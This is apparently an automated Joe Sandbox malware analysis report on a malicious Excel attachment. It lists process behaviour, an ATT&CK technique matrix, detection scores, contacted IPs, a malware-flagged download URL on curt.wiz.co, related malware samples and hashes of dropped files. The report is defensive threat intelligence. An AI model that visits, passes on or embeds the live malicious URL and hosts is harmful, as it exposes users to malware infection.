Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: Order_948575494759.xlsStream path 'MBD0191BFB8/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: Order_948575494759.xlsStream path 'Workbook' entropy: 7.99854241372 (max. 8.0)
Source: ~DFEFC13B3210F99F8A.TMP.12.drStream path 'MBD0191BFB8/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: ~DFEFC13B3210F99F8A.TMP.12.drStream path 'Workbook' entropy: 7.99854241372 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 1050Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts13
Exploitation for Client Execution
1
Scripting
1
Process Injection
2
Masquerading
OS Credential Dumping1
Process Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection
1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Extra Window Memory Injection
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Order_948575494759.xls18%ReversingLabs
Order_948575494759.xls100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\~DFEFC13B3210F99F8A.TMP100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://curt.wiz.co/f0O8JN5298?&letter=muddy&gobbler=tiresome&nexus(Y100%Avira URL Cloudmalware
https://curt.wiz.co/f0O8JN5298?&letter=muddy&gobbler=tiresome&nexus100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
s-part-0035.t-0009.t-msedge.net
13.107.246.63
truefalse
    high
    curt.wiz.co.cdn.gocache.net
    170.82.174.30
    truefalse
      high
      curt.wiz.co
      unknown
      unknownfalse
        high
        NameMaliciousAntivirus DetectionReputation
        https://curt.wiz.co/f0O8JN5298?&letter=muddy&gobbler=tiresome&nexusfalse
        • Avira URL Cloud: malware
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://curt.wiz.co/f0O8JN5298?&letter=muddy&gobbler=tiresome&nexus(YOrder_948575494759.xls, ~DFEFC13B3210F99F8A.TMP.12.drfalse
        • Avira URL Cloud: malware
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        173.214.167.74
        unknownUnited States
        19318IS-AS-1USfalse
        170.82.174.30
        curt.wiz.co.cdn.gocache.netBrazil
        2664443LCLOUDINTERNETSERVICESLTDA-EPPBRfalse
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1577527
        Start date and time:2024-12-18 15:13:17 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 5m 21s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Run name:Without Instrumentation
        Number of analysed new started processes analysed:13
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:Order_948575494759.xls
        Detection:MAL
        Classification:mal84.expl.winXLS@6/21@1/2
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .xls
        • Changed system and user locale, location and keyboard layout to French - France
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Active ActiveX Object
        • Active ActiveX Object
        • Active ActiveX Object
        • Active ActiveX Object
        • Active ActiveX Object
        • Scroll down
        • Close Viewer
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe, MavInject32.exe
        • Excluded IPs from analysis (whitelisted): 52.109.28.46, 23.218.208.109, 52.113.194.132, 52.109.89.19, 104.208.16.89, 20.190.147.1, 172.202.163.200, 4.175.87.197, 13.107.246.63
        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, weu-azsc-000.roaming.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com, ocsp.digicert.com, login.live.com, onedscolprdcus11.centralus.cloudapp.azure.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, azureedge-t-prod.trafficmanager.net, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net, uks-azsc-config.officeapps.live.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size getting too big, too many NtCreateKey calls found.
        • Report size getting too big, too many NtQueryAttributesFile calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Report size getting too big, too many NtReadVirtualMemory calls found.
        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        • VT rate limit hit for: Order_948575494759.xls
        TimeTypeDescription
        09:15:28API Interceptor1086x Sleep call for process: splwow64.exe modified
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        170.82.174.30yGktPvplJn.exeGet hashmaliciousPushdoBrowse
        • www.mqs.com.br/
        a5hbkmGD7N.exeGet hashmaliciousPushdoBrowse
        • www.mqs.com.br/
        9oy0DlGMH9.exeGet hashmaliciousFormBookBrowse
        • www.faunapetsstore.com/o12i/?dT=j6ATUBhxx2glQbP0&2dq=yiHtOwR0aZ7KTWOJuT9hXfachgSHyHMGkjU/6QKzyqsTP1NPRASfxqCAR1p/c7wMh9GXgUQg6w==
        file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
        • www.mqs.com.br/
        file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
        • www.mqs.com.br/
        file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
        • www.mqs.com.br/
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        curt.wiz.co.cdn.gocache.netDocument.xlaGet hashmaliciousUnknownBrowse
        • 170.82.174.30
        #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
        • 170.82.174.30
        #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
        • 170.82.174.30
        #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
        • 170.82.174.30
        Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
        • 170.82.173.30
        Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
        • 170.82.173.30
        Document.xla.xlsxGet hashmaliciousUnknownBrowse
        • 170.82.174.30
        Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
        • 170.82.174.30
        s-part-0035.t-0009.t-msedge.netldqj18tn.exeGet hashmaliciousUnknownBrowse
        • 13.107.246.63
        DOC.exeGet hashmaliciousCryptbotBrowse
        • 13.107.246.63
        2.png.ps1Get hashmaliciousUnknownBrowse
        • 13.107.246.63
        1.png.ps1Get hashmaliciousUnknownBrowse
        • 13.107.246.63
        ko.ps1.2.ps1Get hashmaliciousUnknownBrowse
        • 13.107.246.63
        kjshdgacg18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
        • 13.107.246.63
        steel.exe.2.exeGet hashmaliciousSocks5SystemzBrowse
        • 13.107.246.63
        random.exe.17.exeGet hashmaliciousScreenConnect ToolBrowse
        • 13.107.246.63
        steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
        • 13.107.246.63
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        3LCLOUDINTERNETSERVICESLTDA-EPPBRDocument.xlaGet hashmaliciousUnknownBrowse
        • 170.82.174.30
        #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
        • 170.82.174.30
        #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
        • 170.82.174.30
        #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
        • 170.82.174.30
        Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
        • 170.82.173.30
        Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
        • 170.82.173.30
        Document.xla.xlsxGet hashmaliciousUnknownBrowse
        • 170.82.174.30
        Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
        • 170.82.174.30
        IS-AS-1USnetworkmanager.exeGet hashmaliciousUnknownBrowse
        • 66.45.226.53
        arm6.elfGet hashmaliciousUnknownBrowse
        • 208.73.200.113
        jAktiuZ9R3.msiGet hashmaliciousUnknownBrowse
        • 162.220.166.184
        S54zm7jsZe.msiGet hashmaliciousUnknownBrowse
        • 162.220.166.184
        https://dashboard.sizle.io/p/f7c9cdf19Get hashmaliciousHTMLPhisherBrowse
        • 174.138.189.57
        fWAr4zGUkY.exeGet hashmaliciousRemcos, Amadey, StealcBrowse
        • 66.45.226.53
        file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRATBrowse
        • 205.209.109.10
        file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, VidarBrowse
        • 205.209.109.10
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        6271f898ce5be7dd52b0fc260d0662b3YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
        • 170.82.174.30
        https://ce4.ajax.a8b.co/get?redir=1&id=d4vCW7zizPl1mo0GYx0ELgo+CCIybH9/c4qC7CeWEuI=&uri=//the-western-fire-chiefs-association.jimdosite.comGet hashmaliciousUnknownBrowse
        • 170.82.174.30
        IIC0XbKFjS.lnkGet hashmaliciousRHADAMANTHYSBrowse
        • 170.82.174.30
        Document.xlaGet hashmaliciousUnknownBrowse
        • 170.82.174.30
        V65xPrgEHH.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
        • 170.82.174.30
        #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
        • 170.82.174.30
        #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
        • 170.82.174.30
        Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
        • 170.82.174.30
        Document.xla.xlsxGet hashmaliciousUnknownBrowse
        • 170.82.174.30
        No context
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
        Category:dropped
        Size (bytes):118
        Entropy (8bit):3.5700810731231707
        Encrypted:false
        SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
        MD5:573220372DA4ED487441611079B623CD
        SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
        SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
        SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
        Malicious:false
        Reputation:high, very likely benign file
        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):8184
        Entropy (8bit):2.5100723532229727
        Encrypted:false
        SSDEEP:96:EV5g2s88nDnzStgjWzI5i9dWZBNA+B79YIRdMZgmR7qii1BoFV:Eaemjz8WZT79RdGgmR7qii1BY
        MD5:05AE91B24156E9DD63A806906BD73E38
        SHA1:45B871F4939A79509CA2BBC6BD41DC0CF76E1404
        SHA-256:CEBB7D14075D10C842E4AFE0FF031BA5F93C3C3721C8B18459EED69829DC8A44
        SHA-512:2863158F3CE5D0ED113A59496CD61EEC4AEE98EF9D8C2DD7EE870B20FFB6184462616877F584B92215D66C442C61066C86A751A16020CD1B77F61F879562E6C9
        Malicious:false
        Reputation:low
        Preview:....l...........{...U............A...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):8208
        Entropy (8bit):2.5071412950329353
        Encrypted:false
        SSDEEP:96:Eeg2s88nDnzStgj0b5zL9rQWZB/A+B79YIRdMZgmR7qii1BoFV:E/emjE+WZh79RdGgmR7qii1BY
        MD5:B89649765B5999E4E84F040DF0C914E5
        SHA1:1BF4635A3E9454185B1CCCCAB826D60ABAC5A0B8
        SHA-256:BD59C6303CF92795A38CD76151DE526F6A31FECC46432859EF752DF53773B0E4
        SHA-512:31F4E8852AD4D68220E217F68235C3EBF74F3539AC8F5F2D90257509BDA4A463829D70D4386E6ED5A6CAB199A1AB66B8285D5491074880E724F8E907FCBCCED8
        Malicious:false
        Reputation:low
        Preview:....l...........{...U............A...... EMF..... ..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):13372
        Entropy (8bit):2.646173912466921
        Encrypted:false
        SSDEEP:96:Xgk+uuOAo77ZXXoQ5FSY6Gi+LB3malpsoXpJPJ0HWSj0T84b4IjV:GoFXofLG9HYoWj0DbN
        MD5:4EA6C991E1C88F210E275811F8CBB134
        SHA1:ABD3729722DE76111BE8D382D32B23316004CFDA
        SHA-256:9A9A140B5BD996FA09B8B91DCAA4C376D8485335A8244CFDFA79AF5C001E4D09
        SHA-512:5AE63F801C694D003C037342C1B277DF8896B57AA0C8E30F39205BB43DEA24565F153420D85969305313BD65E6E24D84D259707B72846413EDBD44CE148EFA0B
        Malicious:false
        Reputation:low
        Preview:....l...........................|,..\... EMF....<4..O...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p.................................. C.a.l.i.b.r.i........................................................k.u@b...D.u........NAI.`b..-..C`b...U ..c...d...#.........@........c........#..V...f#.... .0..._#.....|c...X.l.$..
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):8084
        Entropy (8bit):2.5551694039574895
        Encrypted:false
        SSDEEP:96:j+RiOO++Z39FAcRwxBdEtzBfCC7Boff8oBJ6ANQ4HJV:jtGNOzBArH
        MD5:721E8AAC81F0A6D4659831CB8194D668
        SHA1:6BE0CEFAEC9F0B1EAD9DE03C8D4679767CF8B549
        SHA-256:E52DF310BB20C42F738A3C8E03ED4110CB795B8A07AE5D4E474EA075564B1622
        SHA-512:24CACEED3153493E34988C35628FAA2C198C9B13AFDD8ABC214EFBA0ACCD0579BADCD5EB0F76F5BDA16D3A279DB4DF4BB218ABD5FFD751C6E62676BD1AAEF2E7
        Malicious:false
        Preview:....l.........../...n............9...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o...'.......................%...........................................................L...d...........>...............q.......!..............?...........?................................R...p...................................A.r.i.a.l...............................................
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):98872
        Entropy (8bit):2.68655401433455
        Encrypted:false
        SSDEEP:768:XOnGv3n1DW7ohBb66mQK4BTonxqQbApQKyE:+gQE
        MD5:8AFBC05099AD8451C2F6C0B4AC8BE121
        SHA1:583F4314CE4389C16E92AC229ACD4586D6CB215E
        SHA-256:6A5EB43BDBCB806E806DA0B601CBF6C2CE66A776F8FFD5FFC33BC03AC79FFB36
        SHA-512:8A553FF52FD184DAD1EEB08E96B999CB60A26173E5DC766416B26196AF965987FAC58188ABDE0CC03448DB61C1B9B9E98EE61431187A82A110112AB61A8070CC
        Malicious:false
        Preview:....l............................}...... EMF....8...g...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):109544
        Entropy (8bit):4.282675970330063
        Encrypted:false
        SSDEEP:768:I4KlWqWxZiDQ4hHdCUeHxCDJB9Cnh3KCg0F9BV:I42WxF4MyeKCV
        MD5:F7B9A8F20E64B2CB6B572BCBA5866236
        SHA1:2F092A0A518639332BE76BF60DBB966AC331D356
        SHA-256:72447B22A4BBC05B9E9183DF2ADB712AB51C3A45C6247C2303024197D1623F57
        SHA-512:4A78624A9EB02208F3F30D03CC53EBE00BDD2C59E8F7719E35E706D51CD2F8D0D330BE6D6FAD2A9652536F888CB99E0CBE1E3B97A05EA65CB5914C37C501B728
        Malicious:false
        Preview:....l...............r............C...a.. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):134544
        Entropy (8bit):2.9527588414114754
        Encrypted:false
        SSDEEP:768:P0WYNNkN2HtS1u40TiTKAvGNLnvfKx4t1cEU9W3V/DOEsx:pYN/Ni0TiTKeYjfKx4tCEU9W35psx
        MD5:83F48FDD46D3424E92E24E709EAB5960
        SHA1:6CEE65663B48B56BDFF6756C38C1F4190EAC6E12
        SHA-256:77F4BCE7FBE1E2F98A04DC51994467460B255135535CDE954EEE8180F500C6AE
        SHA-512:8F781049001FC063EDB9B4352C0EA05D8DA9DCFC599234A58258C6FB4C4CED2B862A701081F10B68E286124413AD04F4AAAB485D376B0A2FB04167AFF121F47E
        Malicious:false
